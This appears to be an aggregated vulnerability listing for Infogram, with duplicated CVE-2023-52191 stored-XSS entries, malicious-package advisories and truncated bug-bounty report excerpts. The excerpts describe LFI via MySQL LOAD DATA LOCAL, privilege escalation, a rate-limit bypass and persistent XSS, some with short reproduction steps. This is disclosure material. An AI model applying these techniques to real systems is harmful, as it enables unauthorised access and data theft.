EUVD-2023-56864

Malicious code in bioql PyPI...

CVE-2023-52191

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Torbjon Infogram – Add charts, maps and infographics allows Stored XSS.This issue affects Infogram – Add charts, maps and infographics: from n/a through 1.6.1...

CVE-2023-52191

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Torbjon Infogram – Add charts, maps and infographics allows Stored XSS.This issue affects Infogram – Add charts, maps and infographics: from n/a through 1.6.1...

Cross site scripting

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Torbjon Infogram – Add charts, maps and infographics allows Stored XSS.This issue affects Infogram – Add charts, maps and infographics: from n/a through 1.6.1...

CVE-2023-52191

CVE-2023-52191 affects the WordPress Infogram plugin (Infogram – Add charts, maps and infographics)

CVE-2023-52191 WordPress Infogram Plugin <= 1.6.1 is vulnerable to Cross Site Scripting (XSS)

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Torbjon Infogram – Add charts, maps and infographics allows Stored XSS.This issue affects Infogram – Add charts, maps and infographics: from n/a through 1.6.1...

CVE-2023-52191 WordPress Infogram Plugin <= 1.6.1 is vulnerable to Cross Site Scripting (XSS)

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Torbjon Infogram – Add charts, maps and infographics allows Stored XSS.This issue affects Infogram – Add charts, maps and infographics: from n/a through 1.6.1...

WordPress plugin Infogram Cross-Site Scripting Vulnerability

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform supports personal blog sites on PHP and MySQL servers.WordPress plugin is an application plugin. A security vulnerability exists in WordPres...

Infogram <= 1.6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Description The Infogram plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject...

WordPress Infogram Plugin <= 1.6.1 is vulnerable to Cross Site Scripting (XSS)

Software Infogram Type Plugin Vulnerable versions = 1.6.1 Fixed in N/A OWASP Top 10 A3: Injection Classification Cross Site Scripting XSS CVE CVE-2023-52191 Patch priority Low CVSS severity Low 6.5 Developer Claim ownership PSID 7dac0f9fc955 Credits Ngô Thiên An ancorn from VNPT-VCI Required...

Malicious code in @infogram/fetlife-assets (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 0bbc7fa5fbbaaa93092400eb4d10b827920eedaa68af76b4db32d16254661188 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

MAL-2022-357 Malicious code in @infogram/fetlife-assets (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 0bbc7fa5fbbaaa93092400eb4d10b827920eedaa68af76b4db32d16254661188 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Infogram: Bypass to report #280389 [Thinking The issue is not fixed Yet]

Please see the report https://hackerone.com/reports/280389. There it was mentioned that it is resolved but the fact is that I tried with 5000 and it flooded my email. I think the issue is not solved. Please look into this. F668239 Impact Please fix as rate limit on the password reset functionalit...

Infogram: LFI through the MySQL connection

Hello team! I've found a way to read Infogram's server local files through the MySQL connection. The problem is that you're using the LOAD DATA LOCAL feature with your MySQL client. This how an attacker can easily send server's local files to her/his database. I've successfully readed the...

Infogram: Privilege escalation allows to use iframe functionality w/o upgrade

Hello team! I've found a privilege escalation issue which allows to set iframes to the projects w/o upgrading. Steps to reproduce - Login - Navigate to the project - Choose integrations and click the IFrame - See that you'll get upgrade now notification F501019 - Inspect the page with developer...

Infogram: User account blocking by Internal Server error

If you send a language=en in https://infogram.com/api/users/me user be forever get an Internal Server error EVEN AFTER re-logining: https://youtu.be/AxYa11lEiWA I idk why does hackerone can't upload this video so I uploaded this video privately to the youtube! In this video, I'm trying to relogin...

Infogram: possibility to create account without username

hi , infogram.com doesn't allow us to go next untill we give name of our account but i bypassed that. i am able to create an account without any name, just by modify response field. steps:- 1. create new account , when you reach page where you have to give your name. 2. give name and intercept th...

Infogram: New team invitation functionality allows extend team without upgrade

Privilege escalation vulnerability was found, which allowed to bypass the limitation of team members...

Infogram: Persistent XSS in share button

Persistent XSS in "Share" button was found: 1. In custom link field for "Share" button add: ". 2. Share the infographic publicly, navigate to its public URL and click the "Share" button. 3. See that pop-up window activates...

Infogram: Bypass insecure password validation

Hi Team, Summary: Registration is checking the password creation if the password is insecure , but the password reset page was not doing the same validation, so when i input an insecure password using the password reset, the validation on the password creation can be bypass because the password...